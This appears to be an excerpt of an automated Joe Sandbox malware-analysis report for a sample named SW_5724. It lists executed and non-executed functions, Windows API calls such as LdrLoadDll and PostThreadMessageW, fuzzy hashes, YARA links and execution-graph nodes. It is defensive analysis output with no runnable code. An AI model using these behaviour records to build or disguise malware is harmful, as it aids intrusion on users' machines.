                                                                                  • CreateActCtxA.KERNEL32(?), ref: 027F9119
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 9fc1807bc3014b541d17ed75f0a58888b8a0fb634d816f7c353fc7d2db47c788
                                                                                  • Instruction ID: dbcf49e4727d2ac5ca343ec45447135e562df79ade65681cd9eb27eff5f0c4f4
                                                                                  • Opcode Fuzzy Hash: 9fc1807bc3014b541d17ed75f0a58888b8a0fb634d816f7c353fc7d2db47c788
                                                                                  • Instruction Fuzzy Hash: BF41CFB0C04619CFDB24CFA9C884BDEBBB6BF49314F20806AD508AB355DB766945CF90
                                                                                  Function 027F7BEC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 027F9119
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 31a72494ebe5a3800b5ac19ec73168b3bce5381b916480f6b9f5c6844c18defc
                                                                                  • Instruction ID: da8e8615ee5333e22827418aa8554d6192b6903c0e12f90a63d158b7bcd70d77
                                                                                  • Opcode Fuzzy Hash: 31a72494ebe5a3800b5ac19ec73168b3bce5381b916480f6b9f5c6844c18defc
                                                                                  • Instruction Fuzzy Hash: 7A41D1B4C04619CFDB24DFA9C844BDEBBB5BF49304F20806AD508AB355DBB56945CF90
                                                                                  Function 027FE7F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 027FE85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 94e4049ee433aa225e6a8353c79e27ab0cf58cb629b48b09036472d5324c6906
                                                                                  • Instruction ID: 19f12a2a3247de05f67e49842a6b9d8fd4c39e4009353c0f7a342326f327e499
                                                                                  • Opcode Fuzzy Hash: 94e4049ee433aa225e6a8353c79e27ab0cf58cb629b48b09036472d5324c6906
                                                                                  • Instruction Fuzzy Hash: 8E110FB5C04649CFCB20DF9AC445B9EFBF5EB88214F14842AD518A7310D379A545CFA1
                                                                                  Function 00DED3D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c20806a9a5b9cd4ccddb2a614871df5daa1cc7accdb2c9e072a7345e213b6176
                                                                                  • Instruction ID: c0e8b0642edf047ed144bd7cec75a37a3afe0863558a07f2ea4a448cf07e5642
                                                                                  • Opcode Fuzzy Hash: c20806a9a5b9cd4ccddb2a614871df5daa1cc7accdb2c9e072a7345e213b6176
                                                                                  • Instruction Fuzzy Hash: 60212871504284DFDB05EF14D9C0B26BFA6FBA4314F24C569E8090B296C736E856C6B2
                                                                                  Function 00DED4C4 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0fa5e6f582e9aefaf8a96bc3cbf12eabc7c971f5c2c1210e4448b76548458db6
                                                                                  • Instruction ID: 148e5988a707fd4207bb181cc702ce1f5c2ae28752c55f06811d9d0218153d3f
                                                                                  • Opcode Fuzzy Hash: 0fa5e6f582e9aefaf8a96bc3cbf12eabc7c971f5c2c1210e4448b76548458db6
                                                                                  • Instruction Fuzzy Hash: 51212572504280EFCB05EF14D9C0F26BF66FB98318F24C569E8490B256C736D816CAB2
                                                                                  Function 00DFD01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080620294.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_dfd000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de038fc8b32802084cccd6ba5d43ef79873a57156ba8c9eba27b47d82ca0c2db
                                                                                  • Instruction ID: f6c9e5fb63260675e59ac04953979f67534e1e97013572446fd5528a526330f5
                                                                                  • Opcode Fuzzy Hash: de038fc8b32802084cccd6ba5d43ef79873a57156ba8c9eba27b47d82ca0c2db
                                                                                  • Instruction Fuzzy Hash: E721F571504248EFDB14DF24D580B26BB67FB84314F24C56DEA494B386CB36D847CA72
                                                                                  Function 00DFD005 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080620294.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_dfd000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a86d1151d777a67ced98ce03682ecd3328c7c6bb2c97bfb3c35d76309ee6fb0e
                                                                                  • Instruction ID: 99519e989ff9ae47b3122dbe52d279d56e7fce70a332dde9b07c6c3cdfc2348a
                                                                                  • Opcode Fuzzy Hash: a86d1151d777a67ced98ce03682ecd3328c7c6bb2c97bfb3c35d76309ee6fb0e
                                                                                  • Instruction Fuzzy Hash: C721B3355093C48FC702CF20D590711BF72EB46314F29C1EAD8498F2A3C33A980ACB62
                                                                                  Function 00DED3D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f62dab9f2d2df2b0377b3ffc4916db9f3e9f3f44d816f0c017336ff362cce822
                                                                                  • Instruction ID: 0f4ad38e3b1f26e8b69379be4874fa7e453223e2aeca7877802c6c8237703352
                                                                                  • Opcode Fuzzy Hash: f62dab9f2d2df2b0377b3ffc4916db9f3e9f3f44d816f0c017336ff362cce822
                                                                                  • Instruction Fuzzy Hash: 1C112976404280DFCB15DF00D5C0B16BF72FB94314F28C2A9D8090B256C33AE45ACBA2
                                                                                  Function 00DED4BF Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f62dab9f2d2df2b0377b3ffc4916db9f3e9f3f44d816f0c017336ff362cce822
                                                                                  • Instruction ID: f8d5655272df0a7fdd085d9e8f2abdc31054426e15b288500411458a7c035a7f
                                                                                  • Opcode Fuzzy Hash: f62dab9f2d2df2b0377b3ffc4916db9f3e9f3f44d816f0c017336ff362cce822
                                                                                  • Instruction Fuzzy Hash: 26112676404280DFCB16DF10D9C0B16BF72FB84318F28C6A9D8090B256C33AD85ACBA2
                                                                                  Function 00DED731 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 663d1f4a117e625b0a76cab4aff52fe070ccd21f4fa668298afec1344b54dd29
                                                                                  • Instruction ID: 56da497b54b80167d8d1ec8e52527fd8d495b6b8db5deb1f65e1200851d88566
                                                                                  • Opcode Fuzzy Hash: 663d1f4a117e625b0a76cab4aff52fe070ccd21f4fa668298afec1344b54dd29
                                                                                  • Instruction Fuzzy Hash: 5501A7710097849AE7107B26CD84B66FFA9EF91365F28C419ED4A4A282DA789844C671
                                                                                  Function 00DED730 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2080591143.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ded000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2eb37d393655ccac53541745a048da34d09248ab01b6f934852cf378c47e493f
                                                                                  • Instruction ID: df510c67760759af5bb240178c4e30df546621c504cd17623b26f292798ca8f3
                                                                                  • Opcode Fuzzy Hash: 2eb37d393655ccac53541745a048da34d09248ab01b6f934852cf378c47e493f
                                                                                  • Instruction Fuzzy Hash: FCF0C232004284AEE7109F16C884B66FFD8EB90334F18C45AED094E282D3789844CA71

                                                                                  Non-executed Functions

                                                                                  Function 027F2E08 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6b{T$KWe?
                                                                                  • API String ID: 0-4023851026
                                                                                  • Opcode ID: 9dfe1c9b0778a4fecaeb4ceaf0020887ee5e8c1a8d458e84ccb2974044a1d5ad
                                                                                  • Instruction ID: 7987f5ce6b3551bd883a5da60deec9bbb4ac3ec806acaebc2266ce69808432d9
                                                                                  • Opcode Fuzzy Hash: 9dfe1c9b0778a4fecaeb4ceaf0020887ee5e8c1a8d458e84ccb2974044a1d5ad
                                                                                  • Instruction Fuzzy Hash: 30410631A18205CFC790CA68C98595BBBF6FBC4210B60C82AE51BEB795E334E941CF01
                                                                                  Function 027F38E3 Relevance: .1, Instructions: 107COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39d3dd191e7b428c3d11f6e3149a796cc8d7d2f50ada8b845b79f25b0faf36b2
                                                                                  • Instruction ID: 55b4b4ad06c343abba1f603b08c107d3adc5b7c5c66a1fdb9acafb7a899f1172
                                                                                  • Opcode Fuzzy Hash: 39d3dd191e7b428c3d11f6e3149a796cc8d7d2f50ada8b845b79f25b0faf36b2
                                                                                  • Instruction Fuzzy Hash: C841C731F182998FCB80CF79C9815AEBBF2EB89214B1591A6DE05F7351D334D901CB91
                                                                                  Function 027F38F0 Relevance: .1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8f8f5a48b6f45314b3c19e2b016a0c426d0c082b934d632629b8861d9434a29
                                                                                  • Instruction ID: 52a7a70e1927c070af21ff9cf77328fb00fef87e51e04b1b9304d3fbba31c711
                                                                                  • Opcode Fuzzy Hash: b8f8f5a48b6f45314b3c19e2b016a0c426d0c082b934d632629b8861d9434a29
                                                                                  • Instruction Fuzzy Hash: 7641A231F1825A8FCB80DE6AC9815AAB7F6EB88214B159066EE09FB350D334D901CB91

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                  Signature Coverage:9.4%
                                                                                  Total number of Nodes:139
                                                                                  Total number of Limit Nodes:8
                                                                                  execution_graph 95770 424f23 95774 424f3c 95770->95774 95771 424f87 95778 42ea13 95771->95778 95774->95771 95775 424fc7 95774->95775 95777 424fcc 95774->95777 95776 42ea13 RtlFreeHeap 95775->95776 95776->95777 95781 42cc93 95778->95781 95780 424f97 95782 42ccad 95781->95782 95783 42ccbe RtlFreeHeap 95782->95783 95783->95780 95843 42bed3 95844 42bef0 95843->95844 95847 1a92df0 LdrInitializeThunk 95844->95847 95845 42bf18 95847->95845 95848 424b93 95849 424baf 95848->95849 95850 424bd7 95849->95850 95851 424beb 95849->95851 95852 42c903 NtClose 95850->95852 95853 42c903 NtClose 95851->95853 95854 424be0 95852->95854 95855 424bf4 95853->95855 95858 42eb33 RtlAllocateHeap 95855->95858 95857 424bff 95858->95857 95859 42fab3 95860 42fac3 95859->95860 95861 42fac9 95859->95861 95862 42eaf3 RtlAllocateHeap 95861->95862 95863 42faef 95862->95863 95784 414163 95785 41417d 95784->95785 95787 41419b 95785->95787 95790 417913 95785->95790 95788 4141e0 95787->95788 95789 4141cf PostThreadMessageW 95787->95789 95789->95788 95793 41792f 95790->95793 95791 41793e 95791->95787 95792 41795d 95795 417973 LdrLoadDll 95792->95795 95796 41798a 95792->95796 95793->95791 95793->95792 95797 42fe93 LdrLoadDll 95793->95797 95795->95796 95796->95787 95797->95792 95798 41b463 95799 41b4a7 95798->95799 95800 41b4c8 95799->95800 95802 42c903 95799->95802 95803 42c91d 95802->95803 95804 42c92e NtClose 95803->95804 95804->95800 95805 41a6e3 95806 41a6fb 95805->95806 95808 41a755 95805->95808 95806->95808 95809 41e673 95806->95809 95810 41e699 95809->95810 95814 41e793 95810->95814 95815 42fbe3 95810->95815 95812 41e731 95812->95814 95821 42bf23 95812->95821 95814->95808 95816 42fb53 95815->95816 95817 42fbb0 95816->95817 95825 42eaf3 95816->95825 95817->95812 95819 42fb8d 95820 42ea13 RtlFreeHeap 95819->95820 95820->95817 95822 42bf3d 95821->95822 95831 1a92c0a 95822->95831 95823 42bf69 95823->95814 95828 42cc43 95825->95828 95827 42eb0e 95827->95819 95829 42cc60 95828->95829 95830 42cc71 RtlAllocateHeap 95829->95830 95830->95827 95832 1a92c1f LdrInitializeThunk 95831->95832 95833 1a92c11 95831->95833 95832->95823 95833->95823 95834 413c05 95835 413c25 95834->95835 95837 42cba3 95834->95837 95838 42cbbd 95837->95838 95841 1a92c70 LdrInitializeThunk 95838->95841 95839 42cbe5 95839->95835 95841->95839 95842 1a92b60 LdrInitializeThunk 95864 401ad9 95865 401ae0 95864->95865 95868 42ff83 95865->95868 95871 42e5c3 95868->95871 95872 42e5e9 95871->95872 95883 407323 95872->95883 95874 42e5ff 95882 401b75 95874->95882 95886 41b273 95874->95886 95876 42e61e 95877 42e633 95876->95877 95901 42cce3 95876->95901 95897 428463 95877->95897 95880 42e64d 95881 42cce3 ExitProcess 95880->95881 95881->95882 95904 4165d3 95883->95904 95885 407330 95885->95874 95887 41b29f 95886->95887 95915 41b163 95887->95915 95890 41b2e4 95892 41b300 95890->95892 95895 42c903 NtClose 95890->95895 95891 41b2cc 95893 41b2d7 95891->95893 95894 42c903 NtClose 95891->95894 95892->95876 95893->95876 95894->95893 95896 41b2f6 95895->95896 95896->95876 95898 4284c4 95897->95898 95900 4284d1 95898->95900 95926 418783 95898->95926 95900->95880 95902 42ccfd 95901->95902 95903 42cd0e ExitProcess 95902->95903 95903->95877 95905 4165f0 95904->95905 95907 416609 95905->95907 95908 42d383 95905->95908 95907->95885 95910 42d39d 95908->95910 95909 42d3cc 95909->95907 95910->95909 95911 42bf23 LdrInitializeThunk 95910->95911 95912 42d42c 95911->95912 95913 42ea13 RtlFreeHeap 95912->95913 95914 42d445 95913->95914 95914->95907 95916 41b17d 95915->95916 95920 41b259 95915->95920 95921 42bfc3 95916->95921 95919 42c903 NtClose 95919->95920 95920->95890 95920->95891 95922 42bfdd 95921->95922 95925 1a935c0 LdrInitializeThunk 95922->95925 95923 41b24d 95923->95919 95925->95923 95928 4187ad 95926->95928 95927 418cbb 95927->95900 95928->95927 95934 413de3 95928->95934 95930 4188da 95930->95927 95931 42ea13 RtlFreeHeap 95930->95931 95932 4188f2 95931->95932 95932->95927 95933 42cce3 ExitProcess 95932->95933 95933->95927 95938 413e03 95934->95938 95936 413e62 95936->95930 95937 413e6c 95937->95930 95938->95937 95939 41b583 RtlFreeHeap LdrInitializeThunk 95938->95939 95939->95936 95940 418ed8 95941 42c903 NtClose 95940->95941 95942 418ee2 95941->95942

                                                                                  Executed Functions

                                                                                  Function 00417913 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 119 417913-41793c call 42f5f3 123 417942-417950 call 42fbf3 119->123 124 41793e-417941 119->124 127 417960-417971 call 42e093 123->127 128 417952-41795d call 42fe93 123->128 133 417973-417987 LdrLoadDll 127->133 134 41798a-41798d 127->134 128->127 133->134
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction ID: af326da7c132db295e391ced85ce7770f3b587b3f31b4282422e345026d71ec0
                                                                                  • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                                  • Instruction Fuzzy Hash: C50152B1E4010DABDF10DAA5DC42FDEB778AB14308F4041A6F90897241F679EB488B95
                                                                                  Function 0042C903 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 42c903-42c93c call 4046f3 call 42db83 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C937
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction ID: cb036ad0cdd716a926f083ad66e86339c7f4d5c2c0d3a14b9e6433a91f40aa26
                                                                                  • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction Fuzzy Hash: 07E04F752006147BC610EA5AEC01F9B775CDBC5714F404419FB48A7281C6B5791186F8
                                                                                  Function 01A92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 154 1a92b60-1a92b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fb91bc7d660c2e8a28d8bb02333caa7e6c26527afbd74e8db647d5a2675b965d
                                                                                  • Instruction ID: 7acac22f01cc0f8d72d9cf6b4edde788db157665adefecc0439704e112a44219
                                                                                  • Opcode Fuzzy Hash: fb91bc7d660c2e8a28d8bb02333caa7e6c26527afbd74e8db647d5a2675b965d
                                                                                  • Instruction Fuzzy Hash: 379002B170240003410671984424616400A97E0202F96C021E1014690DC62989916225
                                                                                  Function 01A92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 156 1a92df0-1a92dfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f59a723914b06bb74cb930c4afd973cfebd05d496dbac2ef0530e129f76aa96
                                                                                  • Instruction ID: d1ef941751286cae8e04b6be0229f0aba81b896abc36d07da8da68f172ec6090
                                                                                  • Opcode Fuzzy Hash: 8f59a723914b06bb74cb930c4afd973cfebd05d496dbac2ef0530e129f76aa96
                                                                                  • Instruction Fuzzy Hash: 3690027170140413D11271984514707000997D0242FD6C412A0424658DD75A8A52A221
                                                                                  Function 01A92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 155 1a92c70-1a92c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 324a83b8d90df1d417a92b2ed65460848fbea50d7984b9117fa4871e64cd7b45
                                                                                  • Instruction ID: 7fd0d5ffc9d2a15eaec4f41e65639e703d808ff8b5634cbf991438219441fccd
                                                                                  • Opcode Fuzzy Hash: 324a83b8d90df1d417a92b2ed65460848fbea50d7984b9117fa4871e64cd7b45
                                                                                  • Instruction Fuzzy Hash: 5E90027170148802D1117198841474A000597D0302F9AC411A4424758DC79989917221
                                                                                  Function 01A935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 157 1a935c0-1a935cc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e3046692e9ad22e70701b40022d3a977c2daab293e68ebe34d644d5b7fa3554b
                                                                                  • Instruction ID: 6e805aa467bf654ff3f0bcef9f13b0191e8db627df7a84dc0e290b81b072fa9f
                                                                                  • Opcode Fuzzy Hash: e3046692e9ad22e70701b40022d3a977c2daab293e68ebe34d644d5b7fa3554b
                                                                                  • Instruction Fuzzy Hash: 4A900271B0550402D10171984524706100597D0202FA6C411A0424668DC7998A5166A2
                                                                                  Function 004140DE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4140de-4140e1 1 4140e4-4140ee 0->1 2 414138-414142 0->2 5 4140f0 1->5 6 414126-41412c 1->6 3 414144-414157 2->3 4 41419c-4141cd call 4046a3 call 425063 2->4 7 41418c-41419b call 417913 3->7 28 4141ed-4141f3 4->28 29 4141cf-4141de PostThreadMessageW 4->29 10 4140f1-414109 5->10 6->7 8 41412e-414131 6->8 7->4 11 414133-414134 8->11 12 4140be-4140cc 8->12 15 41410c 10->15 11->2 16 41409d-4140ac 12->16 17 4140ce-4140dd 12->17 20 41410d-414112 15->20 26 414051-414052 16->26 27 414054-414075 16->27 17->0 17->20 21 414114-414115 20->21 22 4140ba-4140bc 20->22 21->6 22->12 22->15 26->27 31 414077-414078 27->31 32 414086-414094 27->32 29->28 30 4141e0-4141ea 29->30 30->28 31->10 33 41407a-414084 31->33 32->16 33->32
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 0-962170130
                                                                                  • Opcode ID: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                                  • Instruction ID: 3734ddf9b67ff786c0daef5b36f05ed51fcebabd7f310d1d9df2a0438136e3ca
                                                                                  • Opcode Fuzzy Hash: 62086ea6164a6b55162337466ac6d99804c49254ae63c5d10560bf1a207cbe4b
                                                                                  • Instruction Fuzzy Hash: 0E4152718013657BC7029FB8CC849DBBF78EE927A4718015EEA409F353E22989C7CB85
                                                                                  Function 00414119 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 34 414119-414124 35 414126-41412c 34->35 36 41418d-41419b call 417913 34->36 37 41418c 35->37 38 41412e-414131 35->38 46 41419c-4141cd call 4046a3 call 425063 36->46 37->36 40 414133-414134 38->40 41 4140be-4140cc 38->41 43 414138-414142 40->43 44 41409d-4140ac 41->44 45 4140ce-4140dd 41->45 43->46 47 414144-414157 43->47 52 414051-414052 44->52 53 414054-414075 44->53 49 41410d-414112 45->49 50 4140de-4140e1 45->50 66 4141ed-4141f3 46->66 67 4141cf-4141de PostThreadMessageW 46->67 47->37 54 414114-414115 49->54 55 4140ba-4140bc 49->55 50->43 56 4140e4-4140ee 50->56 52->53 58 414077-414078 53->58 59 414086-414094 53->59 54->35 55->41 60 41410c 55->60 56->35 61 4140f0 56->61 63 4140f1-414109 58->63 64 41407a-414084 58->64 59->44 60->49 61->63 63->60 64->59 67->66 68 4141e0-4141ea 67->68 68->66
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                                  Strings
